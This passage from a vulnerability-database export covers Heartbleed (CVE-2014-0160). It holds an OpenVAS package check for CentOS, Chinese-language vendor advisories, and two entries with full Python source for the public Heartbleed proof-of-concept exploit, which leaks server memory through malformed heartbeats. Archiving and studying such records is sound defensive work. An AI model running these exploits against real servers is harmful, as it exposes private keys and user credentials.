script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T17:27:57", "description": "CVE ID:CVE-2014-0160\r\n\r\nVMware\u591a\u4e2a\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nVMware\u591a\u4e2a\u4ea7\u54c1\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nNicira Network Virtualization Platform (NVP) 3.x\r\nVMware ESXi 5.x\r\nVMware NSX 4.x\r\nVMware NSX 6.x\r\nVMware Fusion 6.x\r\nVmware Horizon Mirage 4.x\r\nVMware Horizon View 5.x\r\nVMware Horizon View Client 2.x\r\nVMware Horizon Workspace 1.x\r\nVMware OVF Tool 3.x\r\nVMware vCenter Server 5.x\r\nVMware vCloud Networking and Security (vCNS) 5.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.vmware.com", "published": "2014-04-16T00:00:00", "title": "VMware\u591a\u4e2a\u4ea7\u54c1OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62199", "id": "SSV:62199", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:28:38", "description": "CVE ID:CVE-2014-0160\r\n\r\nOpenSSL\u662f\u4e00\u79cd\u5f00\u653e\u6e90\u7801\u7684SSL\u5b9e\u73b0\uff0c\u7528\u6765\u5b9e\u73b0\u7f51\u7edc\u901a\u4fe1\u7684\u9ad8\u5f3a\u5ea6\u52a0\u5bc6\uff0c\u73b0\u5728\u88ab\u5e7f\u6cdb\u5730\u7528\u4e8e\u5404\u79cd\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u4e2d\u3002\r\n\r\n\u7531\u4e8e\u5904\u7406TLS heartbeat\u6269\u5c55\u65f6\u7684\u8fb9\u754c\u9519\u8bef\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u62ab\u9732\u8fde\u63a5\u7684\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5b58\u50a8\u5668\u5185\u5bb9\u3002\r\n0\r\nOpenSSL 1.0.2-beta\r\nOpenSSL 1.0.1\r\nOpenSSL 1.0.1g\u7248\u672c\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u5347\u7ea7\u4f7f\u7528\uff1a\r\nhttp://www.openssl.org/", "published": "2014-04-08T00:00:00", "title": "OpenSSL TLS Hearbeat\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62086", "id": "SSV:62086", "sourceData": "\n #!/usr/bin/python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01 \r\n''')\r\n\r\nhb = h2bin(''' \r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time() \r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n\r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n\r\ndef hit_hb(s):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(hello)\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n\r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(hb)\r\n hit_hb(s)\r\n\r\nif __name__ == '__main__':\r\n main()\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-62086"}, {"lastseen": "2017-11-19T13:55:16", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86038", "id": "SSV:86038", "sourceData": "\n # Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: [2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n\r\n\r\n#!/usr/bin/env python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n\treturn x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nversion = []\r\nversion.append(['SSL 3.0','03 00'])\r\nversion.append(['TLS 1.0','03 01'])\r\nversion.append(['TLS 1.1','03 02'])\r\nversion.append(['TLS 1.2','03 03'])\r\n\r\ndef create_hello(version):\r\n\thello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\treturn hello\r\n\r\ndef create_hb(version):\r\n\thb = h2bin('18 ' + version + ' 00 03 01 40 00')\r\n\treturn hb\r\n\r\ndef hexdump(s):\r\n\tfor b in xrange(0, len(s), 16):\r\n\t\tlin = [c for c in s[b : b + 16]]\r\n\t\thxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n\t\tpdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n\t\tprint ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n\tprint\r\n\r\ndef recvall(s, length, timeout=5):\r\n\tendtime = time.time() + timeout\r\n\trdata = ''\r\n\tremain = length\r\n\twhile remain > 0:\r\n\t\trtime = endtime - time.time()\r\n\t\tif rtime < 0:\r\n\t\t\treturn None\r\n\t\tr, w, e = select.select([s], [], [], 5)\r\n\t\tif s in r:\r\n\t\t\tdata = s.recv(remain)\r\n\t\t\t# EOF?\r\n\t\t\tif not data:\r\n\t\t\t\treturn None\r\n\t\t\trdata += data\r\n\t\t\tremain -= len(data)\r\n\treturn rdata\r\n\r\n\r\ndef recvmsg(s):\r\n\thdr = recvall(s, 5)\r\n\tif hdr is None:\r\n\t\tprint 'Unexpected EOF receiving record header - server closed connection'\r\n\t\treturn None, None, None\r\n\ttyp, ver, ln = struct.unpack('>BHH', hdr)\r\n\tpay = recvall(s, ln, 10)\r\n\tif pay is None:\r\n\t\tprint 'Unexpected EOF receiving record payload - server closed connection'\r\n\t\treturn None, None, None\r\n\tprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n\treturn typ, ver, pay\r\n\r\ndef hit_hb(s,hb):\r\n\ts.send(hb)\r\n\twhile True:\r\n\t\ttyp, ver, pay = recvmsg(s)\r\n\t\tif typ is None:\r\n\t\t\tprint 'No heartbeat response received, server likely not vulnerable'\r\n\t\t\treturn False\r\n\r\n\t\tif typ == 24:\r\n\t\t\tprint 'Received heartbeat response:'\r\n\t\t\thexdump(pay)\r\n\t\t\tif len(pay) > 3:\r\n\t\t\t\tprint 'WARNING: server returned more data than it should - server is vulnerable!'\r\n\t\t\telse:\r\n\t\t\t\tprint 'Server processed malformed heartbeat, but did not return any extra data.'\r\n\t\t\treturn True\r\n\r\n\t\tif typ == 21:\r\n\t\t\tprint 'Received alert:'\r\n\t\t\thexdump(pay)\r\n\t\t\tprint 'Server returned error, likely not vulnerable'\r\n\t\t\treturn False\r\n\r\ndef main():\r\n\topts, args = options.parse_args()\r\n\tif len(args) < 1:\r\n\t\toptions.print_help()\r\n\t\treturn\r\n\tfor i in range(len(version)):\r\n\t\tprint 'Trying ' + version[i][0] + '...'\r\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\tprint 'Connecting...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.connect((args[0], opts.port))\r\n\t\tprint 'Sending Client Hello...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hello(version[i][1]))\r\n\t\tprint 'Waiting for Server Hello...'\r\n\t\tsys.stdout.flush()\r\n\t\twhile True:\r\n\t\t\ttyp, ver, pay = recvmsg(s)\r\n\t\t\tif typ == None:\r\n\t\t\t\tprint 'Server closed connection without sending Server Hello.'\r\n\t\t\t\treturn\r\n\t\t\t# Look for server hello done message.\r\n\t\t\tif typ == 22 and ord(pay[0]) == 0x0E:\r\n\t\t\t\tbreak\r\n\r\n\t\tprint 'Sending heartbeat request...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hb(version[i][1]))\r\n\t\tif hit_hb(s,create_hb(version[i][1])):\r\n\t\t\t#Stop if vulnerable\r\n\t\t\tbreak\r\n\r\nif __name__ == '__main__':\r\n\tmain()\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86038"}, {"lastseen": "2017-11-19T17:26:49", "description": "CVE ID:CVE-2014-0160\r\n\r\nOpenVPN\u662f\u4e00\u6b3e\u5f00\u6e90VPN\u5b9e\u73b0\u3002\r\n\r\nOpenVPN\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nOpenVPN 2.x\nOpenVPN 2.3.3-I002\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://openvpn.net/", "published": "2014-04-21T00:00:00", "title": "OpenVPN OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62239", "id": "SSV:62239", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:27:53", "description": "CVE ID:CVE-2014-0160\r\n\r\nSophos Antivirus\u662f\u4e00\u6b3e\u9632\u75c5\u6bd2\u5e94\u7528\u7a0b\u5e8f\u3002\r\n\r\nSophos Antivirus for vShield\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nSophos Antivirus for vShield 1.0\r\nSophos Antivirus for vShield 1.1\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.sophos.com", "published": "2014-04-16T00:00:00", "title": "Sophos Antivirus for vShield OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62197", "id": "SSV:62197", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:53", "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Endpoint Intelligence Agent\u662f\u4e00\u6b3eMcAfee\u4ea7\u54c1\u4e2d\u6240\u4f7f\u7528\u7684\u4e00\u4e2a\u7f51\u7edc\u670d\u52a1\u3002 \r\n\r\nMcAfee Endpoint Intelligence Agent\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Endpoint Intelligence Agent 1.x (Formerly Network Integrity Agent)\nMcAfee Endpoint Intelligence Agent 2.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.mcafee.com", "published": "2014-04-21T00:00:00", "title": "McAfee Endpoint Intelligence Agent OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62238", "id": "SSV:62238", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:31:20", "description": "CVE ID:CVE-2014-0160\r\n\r\nSAP Sybase SQL Anywhere\u662f\u4e00\u5957\u5168\u9762\u7684\u89e3\u51b3\u65b9\u6848,\u5b83\u63d0\u4f9b\u4e86\u6570\u636e\u7ba1\u7406\u3001\u540c\u6b65\u548c\u6570\u636e\u4ea4\u6362\u6280\u672f,\u53ef\u5feb\u901f\u5728\u8fdc\u7a0b\u548c\u79fb\u52a8\u73af\u5883\u4e2d\u5f00\u53d1\u5e76\u914d\u7f6e\u6570\u636e\u5e93\u9a71\u52a8\u7684\u5e94\u7528\u7a0b\u5e8f\u3002\r\n\r\nSAP Sybase SQL Anywhere\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nSAP Sybase SQL Anywhere 12.x\r\nSAP Sybase SQL Anywhere 16.x\nSAP Sybase SQL Anywhere 12.01 ebf 4099\u621616.0 ebf 1881\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.sap.com", "published": "2014-04-21T00:00:00", "title": "SAP Sybase SQL Anywhere OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62244", "id": "SSV:62244", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:23", "description": "CVE ID:CVE-2014-0160\r\n\r\nIBM AIX\u662f\u4e00\u6b3e\u5546\u4e1a\u6027\u8d28\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nIBM AIX\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nIBM AIX 6.x\r\nIBM AIX 7.x\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5382\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u8865\u4e01\u4ee5\u4fee\u590d\u8be5\u6f0f\u6d1e\uff1a\r\nhttp://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc\r\nhttp://www14.software.ibm.com/webapp/set2/subscriptions/onvdq?mode=18&ID=3489", "published": "2014-04-16T00:00:00", "title": "IBM AIX OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62187", "id": "SSV:62187", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:43", "description": "CVE ID:CVE-2014-0160\r\n\r\nOracle Session Monitor Suite\u662f\u4e00\u6b3eOracle\u516c\u53f8\u63a8\u51fa\u7684\u4f1a\u8bdd\u76d1\u89c6\u5957\u4ef6\u3002\r\n\r\nOracle Session Monitor Suite\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\r\n0\r\nOracle Session Monitor Suite 3.x\r\nOracle Session Monitor Suite 3.3.40.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.oracle.com", "published": "2014-04-21T00:00:00", "title": "Oracle Session Monitor Suite OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62240", "id": "SSV:62240", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:30", "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Email Gateway\u662f\u4e00\u6b3e\u5168\u9762\u7684\u7535\u5b50\u90ae\u4ef6\u5b89\u5168\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nMcAfee Email Gateway\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Email Gateway 7.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://kc.mcafee.com/corporate/index?page=content&id=SB10071", "published": "2014-04-16T00:00:00", "title": "McAfee Email Gateway OpenSSL 